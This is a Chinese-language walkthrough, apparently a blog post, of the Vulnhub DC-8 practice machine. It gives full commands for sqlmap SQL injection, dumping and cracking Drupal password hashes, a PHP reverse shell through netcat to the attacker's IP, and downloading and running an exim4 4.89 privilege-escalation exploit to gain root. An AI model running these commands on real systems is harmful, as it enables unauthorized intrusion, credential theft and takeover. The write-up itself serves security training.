Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/
将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24
再使用nmap扫描靶机操作系统,开放端口和对应服务等
靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页,然后直接在kali机浏览器地址栏输入http://192.168.172.147进行访问
点击页面中Details的【Who We Are】,发现url中带有参数
加入脏字符',发现确实存在注入点
使用sqlmap跑一下看能爆出些什么东西,命令sqlmap -u "http://192.168.172.147/?nid=1"
使用命令sqlmap -u "http://192.168.172.147/?nid=1" -dbs爆出数据库名
再根据数据库名使用命令sqlmap -u "http://192.168.172.147/?nid=1" -D d7db -tables爆出d7db数据库中的数据表名
然后再将数据表users中的数据爆出看看有没有什么东西,命令sqlmap -u "http://192.168.172.147/?nid=1" -D d7db -T users -dump
得到后台账号和密码,将密码复制出来保存到adpass.txt和johnpass.txt文件中,然后使用john工具进行爆破
得到账户john的密码为turtle,账户admin的密码无法爆破,现在使用命令dirb http://192.168.172.147扫描网站目录和文件
先看一下robots.txt文件内容,找到登录页面
然后使用用户名john和密码turtle进行登录
经过各种搜索发现,在这个地方可以执行php代码
在这里可以输入php代码执行,先选择【php code】,这点和DC-7有异曲同工之妙
然后将反弹shell的命令<?php system("nc -e /bin/bash 192.168.172.131 1234"); ?>填写到Confirmation message 中,这里的IP地址为kali的IP地址,不要弄成靶机的了,我们是需要将靶机的shell反弹到kali机
然后往下翻到最底下,点击【save configuration】
然后在kali设置监听命令nc -lvvp 1234等待靶机反弹shell
然后回到网站contact us的view页面,随便输入一些信息然后点击【submit】就可以反弹回shell
到kali监听处看一下,发现shell已经反弹成功
但此时的shell不是交互式shell,所以使用命令python -c "import pty; pty.spawn('/bin/bash')"获取一个交互式的shell
接下来想办法提权,先考虑suid提权,使用命令find / -user root -perm -4000 -print 2>/dev/null,查看可以用于suid提权的命令
发现一个比较奇怪的命令exim4,先查看一下命令版本,使用命令/usr/sbin/exim4 --version,发现是4.89版本
然后使用命令searchsploit exim 4搜索可以利用的提权方法,然后我们选择使用46996.sh这个
我们决使用靶机的wget命令将该脚本下载到靶机中,先将kali机的apache服务开启,命令service apache2 start
然后需要先将攻击脚本文件复制到Apache服务的根目录/var/www/html下,命令cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html/exp.sh
还需要先在kali中使用set ff=unix,告诉编译器,使用unix换行符,否则会无法使用脚本
在靶机反弹回来的shell处使用命令wget http://192.168.172.131/exp.sh将脚本下载到靶机中
失败了,那是因为在这个目录下没有权限,所以要先选择一个不需要root用户权限的目录,我们选择/tmp目录
成功将exp.sh下载到靶机中,但是发现没有执行权限,使用命令chmod +x exp.sh赋予脚本执行权限,并使用命令./exp.sh -m netcat来执行脚本
提权成功,跳转到/root目录下即可查看flag
4566
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
